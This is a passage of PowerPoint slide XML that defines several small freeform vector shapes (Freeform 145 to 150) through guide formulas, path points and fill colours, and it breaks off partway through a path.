              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10738" name="Freeform 145"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1231" y="2266"/>
                <a:ext cx="14" cy="46"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 14"/>
                  <a:gd name="T1" fmla="*/ 1 h 46"/>
                  <a:gd name="T2" fmla="*/ 14 w 14"/>
                  <a:gd name="T3" fmla="*/ 0 h 46"/>
                  <a:gd name="T4" fmla="*/ 13 w 14"/>
                  <a:gd name="T5" fmla="*/ 0 h 46"/>
                  <a:gd name="T6" fmla="*/ 11 w 14"/>
                  <a:gd name="T7" fmla="*/ 0 h 46"/>
                  <a:gd name="T8" fmla="*/ 9 w 14"/>
                  <a:gd name="T9" fmla="*/ 0 h 46"/>
                  <a:gd name="T10" fmla="*/ 8 w 14"/>
                  <a:gd name="T11" fmla="*/ 0 h 46"/>
                  <a:gd name="T12" fmla="*/ 6 w 14"/>
                  <a:gd name="T13" fmla="*/ 0 h 46"/>
                  <a:gd name="T14" fmla="*/ 2 w 14"/>
                  <a:gd name="T15" fmla="*/ 0 h 46"/>
                  <a:gd name="T16" fmla="*/ 0 w 14"/>
                  <a:gd name="T17" fmla="*/ 2 h 46"/>
                  <a:gd name="T18" fmla="*/ 0 w 14"/>
                  <a:gd name="T19" fmla="*/ 46 h 46"/>
                  <a:gd name="T20" fmla="*/ 1 w 14"/>
                  <a:gd name="T21" fmla="*/ 46 h 46"/>
                  <a:gd name="T22" fmla="*/ 1 w 14"/>
                  <a:gd name="T23" fmla="*/ 46 h 46"/>
                  <a:gd name="T24" fmla="*/ 3 w 14"/>
                  <a:gd name="T25" fmla="*/ 46 h 46"/>
                  <a:gd name="T26" fmla="*/ 4 w 14"/>
                  <a:gd name="T27" fmla="*/ 44 h 46"/>
                  <a:gd name="T28" fmla="*/ 7 w 14"/>
                  <a:gd name="T29" fmla="*/ 44 h 46"/>
                  <a:gd name="T30" fmla="*/ 9 w 14"/>
                  <a:gd name="T31" fmla="*/ 43 h 46"/>
                  <a:gd name="T32" fmla="*/ 11 w 14"/>
                  <a:gd name="T33" fmla="*/ 42 h 46"/>
                  <a:gd name="T34" fmla="*/ 14 w 14"/>
                  <a:gd name="T35" fmla="*/ 41 h 46"/>
                  <a:gd name="T36" fmla="*/ 14 w 14"/>
                  <a:gd name="T37" fmla="*/ 1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46"/>
                  <a:gd name="T59" fmla="*/ 14 w 14"/>
                  <a:gd name="T60" fmla="*/ 46 h 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46">
                    <a:moveTo>
                      <a:pt x="14" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="D1F2F2"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10739" name="Freeform 146"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1232" y="2266"/>
                <a:ext cx="9" cy="27"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 9 w 9"/>
                  <a:gd name="T1" fmla="*/ 1 h 27"/>
                  <a:gd name="T2" fmla="*/ 9 w 9"/>
                  <a:gd name="T3" fmla="*/ 1 h 27"/>
                  <a:gd name="T4" fmla="*/ 8 w 9"/>
                  <a:gd name="T5" fmla="*/ 1 h 27"/>
                  <a:gd name="T6" fmla="*/ 7 w 9"/>
                  <a:gd name="T7" fmla="*/ 1 h 27"/>
                  <a:gd name="T8" fmla="*/ 6 w 9"/>
                  <a:gd name="T9" fmla="*/ 0 h 27"/>
                  <a:gd name="T10" fmla="*/ 5 w 9"/>
                  <a:gd name="T11" fmla="*/ 0 h 27"/>
                  <a:gd name="T12" fmla="*/ 3 w 9"/>
                  <a:gd name="T13" fmla="*/ 1 h 27"/>
                  <a:gd name="T14" fmla="*/ 1 w 9"/>
                  <a:gd name="T15" fmla="*/ 1 h 27"/>
                  <a:gd name="T16" fmla="*/ 0 w 9"/>
                  <a:gd name="T17" fmla="*/ 2 h 27"/>
                  <a:gd name="T18" fmla="*/ 0 w 9"/>
                  <a:gd name="T19" fmla="*/ 27 h 27"/>
                  <a:gd name="T20" fmla="*/ 0 w 9"/>
                  <a:gd name="T21" fmla="*/ 27 h 27"/>
                  <a:gd name="T22" fmla="*/ 1 w 9"/>
                  <a:gd name="T23" fmla="*/ 27 h 27"/>
                  <a:gd name="T24" fmla="*/ 2 w 9"/>
                  <a:gd name="T25" fmla="*/ 27 h 27"/>
                  <a:gd name="T26" fmla="*/ 3 w 9"/>
                  <a:gd name="T27" fmla="*/ 27 h 27"/>
                  <a:gd name="T28" fmla="*/ 5 w 9"/>
                  <a:gd name="T29" fmla="*/ 27 h 27"/>
                  <a:gd name="T30" fmla="*/ 6 w 9"/>
                  <a:gd name="T31" fmla="*/ 26 h 27"/>
                  <a:gd name="T32" fmla="*/ 8 w 9"/>
                  <a:gd name="T33" fmla="*/ 25 h 27"/>
                  <a:gd name="T34" fmla="*/ 9 w 9"/>
                  <a:gd name="T35" fmla="*/ 23 h 27"/>
                  <a:gd name="T36" fmla="*/ 9 w 9"/>
                  <a:gd name="T37" fmla="*/ 1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27"/>
                  <a:gd name="T59" fmla="*/ 9 w 9"/>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27">
                    <a:moveTo>
                      <a:pt x="9" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="E5FFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10740" name="Freeform 147"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1343" y="2343"/>
                <a:ext cx="14" cy="14"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 14"/>
                  <a:gd name="T1" fmla="*/ 14 h 14"/>
                  <a:gd name="T2" fmla="*/ 8 w 14"/>
                  <a:gd name="T3" fmla="*/ 14 h 14"/>
                  <a:gd name="T4" fmla="*/ 9 w 14"/>
                  <a:gd name="T5" fmla="*/ 13 h 14"/>
                  <a:gd name="T6" fmla="*/ 10 w 14"/>
                  <a:gd name="T7" fmla="*/ 13 h 14"/>
                  <a:gd name="T8" fmla="*/ 11 w 14"/>
                  <a:gd name="T9" fmla="*/ 12 h 14"/>
                  <a:gd name="T10" fmla="*/ 13 w 14"/>
                  <a:gd name="T11" fmla="*/ 11 h 14"/>
                  <a:gd name="T12" fmla="*/ 13 w 14"/>
                  <a:gd name="T13" fmla="*/ 10 h 14"/>
                  <a:gd name="T14" fmla="*/ 14 w 14"/>
                  <a:gd name="T15" fmla="*/ 8 h 14"/>
                  <a:gd name="T16" fmla="*/ 14 w 14"/>
                  <a:gd name="T17" fmla="*/ 7 h 14"/>
                  <a:gd name="T18" fmla="*/ 14 w 14"/>
                  <a:gd name="T19" fmla="*/ 6 h 14"/>
                  <a:gd name="T20" fmla="*/ 13 w 14"/>
                  <a:gd name="T21" fmla="*/ 5 h 14"/>
                  <a:gd name="T22" fmla="*/ 13 w 14"/>
                  <a:gd name="T23" fmla="*/ 4 h 14"/>
                  <a:gd name="T24" fmla="*/ 11 w 14"/>
                  <a:gd name="T25" fmla="*/ 3 h 14"/>
                  <a:gd name="T26" fmla="*/ 10 w 14"/>
                  <a:gd name="T27" fmla="*/ 1 h 14"/>
                  <a:gd name="T28" fmla="*/ 9 w 14"/>
                  <a:gd name="T29" fmla="*/ 0 h 14"/>
                  <a:gd name="T30" fmla="*/ 8 w 14"/>
                  <a:gd name="T31" fmla="*/ 0 h 14"/>
                  <a:gd name="T32" fmla="*/ 7 w 14"/>
                  <a:gd name="T33" fmla="*/ 0 h 14"/>
                  <a:gd name="T34" fmla="*/ 6 w 14"/>
                  <a:gd name="T35" fmla="*/ 0 h 14"/>
                  <a:gd name="T36" fmla="*/ 4 w 14"/>
                  <a:gd name="T37" fmla="*/ 0 h 14"/>
                  <a:gd name="T38" fmla="*/ 3 w 14"/>
                  <a:gd name="T39" fmla="*/ 1 h 14"/>
                  <a:gd name="T40" fmla="*/ 2 w 14"/>
                  <a:gd name="T41" fmla="*/ 3 h 14"/>
                  <a:gd name="T42" fmla="*/ 1 w 14"/>
                  <a:gd name="T43" fmla="*/ 4 h 14"/>
                  <a:gd name="T44" fmla="*/ 1 w 14"/>
                  <a:gd name="T45" fmla="*/ 5 h 14"/>
                  <a:gd name="T46" fmla="*/ 0 w 14"/>
                  <a:gd name="T47" fmla="*/ 6 h 14"/>
                  <a:gd name="T48" fmla="*/ 0 w 14"/>
                  <a:gd name="T49" fmla="*/ 7 h 14"/>
                  <a:gd name="T50" fmla="*/ 0 w 14"/>
                  <a:gd name="T51" fmla="*/ 8 h 14"/>
                  <a:gd name="T52" fmla="*/ 1 w 14"/>
                  <a:gd name="T53" fmla="*/ 10 h 14"/>
                  <a:gd name="T54" fmla="*/ 1 w 14"/>
                  <a:gd name="T55" fmla="*/ 11 h 14"/>
                  <a:gd name="T56" fmla="*/ 2 w 14"/>
                  <a:gd name="T57" fmla="*/ 12 h 14"/>
                  <a:gd name="T58" fmla="*/ 3 w 14"/>
                  <a:gd name="T59" fmla="*/ 13 h 14"/>
                  <a:gd name="T60" fmla="*/ 4 w 14"/>
                  <a:gd name="T61" fmla="*/ 13 h 14"/>
                  <a:gd name="T62" fmla="*/ 6 w 14"/>
                  <a:gd name="T63" fmla="*/ 14 h 14"/>
                  <a:gd name="T64" fmla="*/ 7 w 14"/>
                  <a:gd name="T65" fmla="*/ 14 h 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
                  <a:gd name="T100" fmla="*/ 0 h 14"/>
                  <a:gd name="T101" fmla="*/ 14 w 14"/>
                  <a:gd name="T102" fmla="*/ 14 h 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 h="14">
                    <a:moveTo>
                      <a:pt x="7" y="14"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="14"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10741" name="Freeform 148"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1302" y="2343"/>
                <a:ext cx="7" cy="7"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 7"/>
                  <a:gd name="T1" fmla="*/ 7 h 7"/>
                  <a:gd name="T2" fmla="*/ 5 w 7"/>
                  <a:gd name="T3" fmla="*/ 7 h 7"/>
                  <a:gd name="T4" fmla="*/ 6 w 7"/>
                  <a:gd name="T5" fmla="*/ 6 h 7"/>
                  <a:gd name="T6" fmla="*/ 6 w 7"/>
                  <a:gd name="T7" fmla="*/ 5 h 7"/>
                  <a:gd name="T8" fmla="*/ 7 w 7"/>
                  <a:gd name="T9" fmla="*/ 4 h 7"/>
                  <a:gd name="T10" fmla="*/ 6 w 7"/>
                  <a:gd name="T11" fmla="*/ 3 h 7"/>
                  <a:gd name="T12" fmla="*/ 6 w 7"/>
                  <a:gd name="T13" fmla="*/ 1 h 7"/>
                  <a:gd name="T14" fmla="*/ 5 w 7"/>
                  <a:gd name="T15" fmla="*/ 0 h 7"/>
                  <a:gd name="T16" fmla="*/ 3 w 7"/>
                  <a:gd name="T17" fmla="*/ 0 h 7"/>
                  <a:gd name="T18" fmla="*/ 2 w 7"/>
                  <a:gd name="T19" fmla="*/ 0 h 7"/>
                  <a:gd name="T20" fmla="*/ 1 w 7"/>
                  <a:gd name="T21" fmla="*/ 1 h 7"/>
                  <a:gd name="T22" fmla="*/ 0 w 7"/>
                  <a:gd name="T23" fmla="*/ 3 h 7"/>
                  <a:gd name="T24" fmla="*/ 0 w 7"/>
                  <a:gd name="T25" fmla="*/ 4 h 7"/>
                  <a:gd name="T26" fmla="*/ 0 w 7"/>
                  <a:gd name="T27" fmla="*/ 5 h 7"/>
                  <a:gd name="T28" fmla="*/ 1 w 7"/>
                  <a:gd name="T29" fmla="*/ 6 h 7"/>
                  <a:gd name="T30" fmla="*/ 2 w 7"/>
                  <a:gd name="T31" fmla="*/ 7 h 7"/>
                  <a:gd name="T32" fmla="*/ 3 w 7"/>
                  <a:gd name="T33" fmla="*/ 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7"/>
                  <a:gd name="T53" fmla="*/ 7 w 7"/>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7">
                    <a:moveTo>
                      <a:pt x="3" y="7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="7"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10742" name="Freeform 149"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1314" y="2343"/>
                <a:ext cx="5" cy="7"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 5"/>
                  <a:gd name="T1" fmla="*/ 7 h 7"/>
                  <a:gd name="T2" fmla="*/ 4 w 5"/>
                  <a:gd name="T3" fmla="*/ 7 h 7"/>
                  <a:gd name="T4" fmla="*/ 5 w 5"/>
                  <a:gd name="T5" fmla="*/ 7 h 7"/>
                  <a:gd name="T6" fmla="*/ 5 w 5"/>
                  <a:gd name="T7" fmla="*/ 6 h 7"/>
                  <a:gd name="T8" fmla="*/ 5 w 5"/>
                  <a:gd name="T9" fmla="*/ 4 h 7"/>
                  <a:gd name="T10" fmla="*/ 5 w 5"/>
                  <a:gd name="T11" fmla="*/ 3 h 7"/>
                  <a:gd name="T12" fmla="*/ 5 w 5"/>
                  <a:gd name="T13" fmla="*/ 1 h 7"/>
                  <a:gd name="T14" fmla="*/ 4 w 5"/>
                  <a:gd name="T15" fmla="*/ 1 h 7"/>
                  <a:gd name="T16" fmla="*/ 3 w 5"/>
                  <a:gd name="T17" fmla="*/ 0 h 7"/>
                  <a:gd name="T18" fmla="*/ 2 w 5"/>
                  <a:gd name="T19" fmla="*/ 1 h 7"/>
                  <a:gd name="T20" fmla="*/ 1 w 5"/>
                  <a:gd name="T21" fmla="*/ 1 h 7"/>
                  <a:gd name="T22" fmla="*/ 0 w 5"/>
                  <a:gd name="T23" fmla="*/ 3 h 7"/>
                  <a:gd name="T24" fmla="*/ 0 w 5"/>
                  <a:gd name="T25" fmla="*/ 4 h 7"/>
                  <a:gd name="T26" fmla="*/ 0 w 5"/>
                  <a:gd name="T27" fmla="*/ 6 h 7"/>
                  <a:gd name="T28" fmla="*/ 1 w 5"/>
                  <a:gd name="T29" fmla="*/ 7 h 7"/>
                  <a:gd name="T30" fmla="*/ 2 w 5"/>
                  <a:gd name="T31" fmla="*/ 7 h 7"/>
                  <a:gd name="T32" fmla="*/ 3 w 5"/>
                  <a:gd name="T33" fmla="*/ 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7"/>
                  <a:gd name="T53" fmla="*/ 5 w 5"/>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7">
                    <a:moveTo>
                      <a:pt x="3" y="7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="7"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10743" name="Freeform 150"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1268" y="2251"/>
                <a:ext cx="19" cy="92"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 19"/>
                  <a:gd name="T1" fmla="*/ 1 h 92"/>
                  <a:gd name="T2" fmla="*/ 6 w 19"/>
                  <a:gd name="T3" fmla="*/ 3 h 92"/>
                  <a:gd name="T4" fmla="*/ 4 w 19"/>
                  <a:gd name="T5" fmla="*/ 8 h 92"/>
                  <a:gd name="T6" fmla="*/ 2 w 19"/>
                  <a:gd name="T7" fmla="*/ 16 h 92"/>
                  <a:gd name="T8" fmla="*/ 1 w 19"/>
                  <a:gd name="T9" fmla="*/ 28 h 92"/>
                  <a:gd name="T10" fmla="*/ 0 w 19"/>
                  <a:gd name="T11" fmla="*/ 41 h 92"/>
                  <a:gd name="T12" fmla="*/ 0 w 19"/>
                  <a:gd name="T13" fmla="*/ 57 h 92"/>
                  <a:gd name="T14" fmla="*/ 1 w 19"/>
                  <a:gd name="T15" fmla="*/ 73 h 92"/>
                  <a:gd name="T16" fmla="*/ 5 w 19"/>
                  <a:gd name="T17" fmla="*/ 92 h 92"/>
                  <a:gd name="T18" fmla="*/ 19 w 19"/>
                  <a:gd name="T19" fmla="*/ 92 h 92"/>
                  <a:gd name="T20" fmla="*/ 18 w 19"/>
                  <a:gd name="T21" fmla="*/ 89 h 92"/>
                  <a:gd name="T22" fmla="*/ 16 w 19"/>
                  <a:gd name="T23" fmla="*/ 82 h 92"/>
                  <a:gd name="T24" fmla="*/ 15 w 19"/>
                  <a:gd name="T25" fmla="*/ 70 h 92"/>
                  <a:gd name="T26" fmla="*/ 14 w 19"/>
                  <a:gd name="T27" fmla="*/ 57 h 92"/>
                  <a:gd name="T28" fmla="*/ 13 w 19"/>
                  <a:gd name="T29" fmla="*/ 42 h 92"/>
                  <a:gd name="T30" fmla="*/ 13 w 19"/>
                  <a:gd name="T31" fmla="*/ 27 h 92"/>
                  <a:gd name="T32" fmla="*/ 15 w 19"/>
                  <a:gd name="T33" fmla="*/ 13 h 92"/>
                  <a:gd name="T34" fmla="*/ 19 w 19"/>
                  <a:gd name="T35" fmla="*/ 1 h 92"/>
                  <a:gd name="T36" fmla="*/ 19 w 19"/>
                  <a:gd name="T37" fmla="*/ 1 h 92"/>
                  <a:gd name="T38" fmla="*/ 19 w 19"/>
                  <a:gd name="T39" fmla="*/ 0 h 92"/>
                  <a:gd name="T40" fmla="*/ 19 w 19"/>
                  <a:gd name="T41" fmla="*/ 0 h 92"/>
                  <a:gd name="T42" fmla="*/ 18 w 19"/>
                  <a:gd name="T43" fmla="*/ 0 h 92"/>
                  <a:gd name="T44" fmla="*/ 16 w 19"/>
                  <a:gd name="T45" fmla="*/ 0 h 92"/>
                  <a:gd name="T46" fmla="*/ 14 w 19"/>
                  <a:gd name="T47" fmla="*/ 0 h 92"/>
                  <a:gd name="T48" fmla="*/ 11 w 19"/>
                  <a:gd name="T49" fmla="*/ 0 h 92"/>
                  <a:gd name="T50" fmla="*/ 6 w 19"/>
                  <a:gd name="T51" fmla="*/ 1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
                  <a:gd name="T79" fmla="*/ 0 h 92"/>
                  <a:gd name="T80" fmla="*/ 19 w 19"/>
                  <a:gd name="T81" fmla="*/ 92 h 9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 h="92">
                    <a:moveTo>
                      <a:pt x="6" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
